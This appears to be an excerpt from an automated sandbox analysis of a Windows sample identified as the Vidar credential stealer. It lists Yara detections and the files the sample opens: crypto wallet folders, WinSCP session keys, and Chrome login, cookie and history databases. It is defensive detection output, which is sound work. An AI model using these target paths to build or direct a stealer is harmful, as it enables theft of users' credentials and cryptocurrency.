Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.31.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.22.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.26.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.32.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.14.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: cYKFZFK0Rg.exe PID: 5468, type: MEMORYSTR
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\??
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\????????
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\????????
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\??
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\????????
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Source: cYKFZFK0Rg.exe, 00000001.00000000.439941163.0000000000654000.00000004.00000020.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets\??'c
Source: cYKFZFK0Rg.exe, 00000001.00000000.443127624.000000000376F000.00000004.00000001.sdmp String found in binary or memory: sers\user\AppData\Roaming\ElectronCash\wallets\????????x64) - 12.0.3066
Source: cYKFZFK0Rg.exe, 00000001.00000000.310964410.0000000000400000.00000040.00020000.sdmp String found in binary or memory: JaxxLiberty
Source: cYKFZFK0Rg.exe, 00000001.00000000.439941163.0000000000654000.00000004.00000020.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\??t
Source: cYKFZFK0Rg.exe, 00000001.00000000.443127624.000000000376F000.00000004.00000001.sdmp String found in binary or memory: ElectrumLTC
Source: cYKFZFK0Rg.exe, 00000001.00000000.439941163.0000000000654000.00000004.00000020.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\?
Source: cYKFZFK0Rg.exe, 00000001.00000000.442698775.00000000032D9000.00000004.00000040.sdmp String found in binary or memory: Exodus
Source: cYKFZFK0Rg.exe, 00000001.00000000.439941163.0000000000654000.00000004.00000020.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\MultiDoge\??[vk
Source: cYKFZFK0Rg.exe, 00000001.00000000.439941163.0000000000654000.00000004.00000020.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\*/he
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: cYKFZFK0Rg.exe PID: 5468, type: MEMORYSTR

Remote Access Functionality:

Yara detected Vidar
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: cYKFZFK0Rg.exe PID: 5468, type: MEMORYSTR